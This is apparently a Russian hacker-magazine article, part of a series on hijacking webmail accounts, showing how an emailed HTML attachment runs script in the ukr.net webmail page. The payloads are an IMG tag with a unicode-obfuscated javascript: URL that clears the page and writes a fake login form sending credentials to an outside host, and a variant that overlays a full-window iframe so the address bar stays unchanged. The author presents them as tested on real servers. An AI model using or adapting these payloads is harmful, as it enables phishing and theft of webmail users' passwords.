Для тех кто в танке, это продолжение
статей на тему захвата ящика, смотри части первую
и вторую.

Что ж я наслышался многих упреков... Всем
что-то не нравится, но я повторяю: я показываю
рабочие примеры на реальных серваках. Использовать тот или иной
способ тебе никто не запрещает, я просто стараюсь расширить твое
мировоззрение. Знать, как использовать
какой-то баг это всегда хорошо.

На меня нагрузили мол все это не сработает на умном ламере 🙂 (даже
не звучит). Что мол все нормальные люди увидят разницу. Ну
во-первых, ты часто смотришь на адресную строку? Если да, то
все равно когда там написано чего-то похожее, ты
не заметишь разницы. Но и на самых глазастых найдется своя катаракта. 

Итак цель: сохранить адресную строку неизменной. 

Для начала скажу что все тестилось на www.ukr.net. Рассмотрим простой пример,
пользователю приходит письмо с вложением
main.html, которае изменяет 🙂 содержимое паги: 

<IMG src="https://xakep.ru/wp-content/uploads/post/15702/JavaScript: 
document.open(); 
document.clear(); 
document.write('<form action=http://main.host.com/cgi-bin/main.cgi>'); 
document.write('Login:<input type=text name=login><br>'); 
document.write('Passwd:<input type=password name=passwd><br>'); 
document.write('<input type=submit value=ok>');" 

Теперь объясняю. На www.ukr.net как и на www.mail.ru аттач открывается сам, но
также и обрезаются все скрипты (точнее места где говорится о начале скрипта),
поэтому мы "javascript" пишем в юникоде. Очищаем окно браузера и выводим в него
простенькую форму регистрации. 

Таким способом можно создать на лету нужную нам форму регистрации. Но пришлось
бы весь код патчить для того чтобы корректно
сработал ява скрипт. Мы можем это дело сделать по другому. Вставим в чистый документ фрейм, но не обычный, а
IFRAME так как браузер не позволяет яве генерить фреймы...
вроде 🙂 Значит наш аттач будет выглядеть гдето так: 

<IMG src="https://xakep.ru/wp-content/uploads/post/15702/JavaScript: 
document.open(); 
document.clear(); 
document.write('<iframe src=http://main.host.com/auth.html width=100% 
height=100%</iframe>')" 

В результате адресная строка не изменится, а в окне будет совсем другая пага,
хотя выглядеть они должны одинаково 😉 

А теперь сдвинем фрейм в нулевую позицию для этого изменим 4-ую строку: 

document.write('<body rightmargin=0 topmargin=0><iframe 
src=http://main.host.com/auth.html width=100% height=100%</iframe>')" 

Но палевный скроллбар у фрейма... Поставим фрейму height=1000 вместо
height=100%. Отлично! 

Ну вот теперь качество нашей роботы
улучшилось 😉 Ждите добавки 🙂

  • Новый червь Redesi

    В Сети появился новый, весьма вредоносный червяк под именем Redesi, распространяющийся по …
    19.10.2001
    10 мин на чтение

  • Переполнение буфера в Boozt!

    Boozt! - программное обеспечение для управления баннерами под Linux.  Переполнение б…
    11.01.2002
    16 мин на чтение

  • Курс молодого флудера

    Как говорится, если чат не ломается, то он флудится… Здесь я попробую рассмотреть способ, …
    30.08.2001
    20 мин на чтение

  • Грузим трояны через Help

    Броузеры Internet Explorer 5.5 и 6.0 содержат уязвимость, которая позволяет выполнять прои…
    13.02.2002
    2 мин на чтение

  • Порт сокетных приложений из Unix в Windows

    Binary Rape cos125@hotmail.com Anarki blaze@hotbox.ru http://blacksun.box.sk   Как из…
    22.05.2002
    32 мин на чтение

  • ActionScript во Flash

    Сегодня мы будем опять пытаться говорить про Flash. Вернее, я буду говорить, а ты будешь м…
    06.08.2001
    3 мин на чтение

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии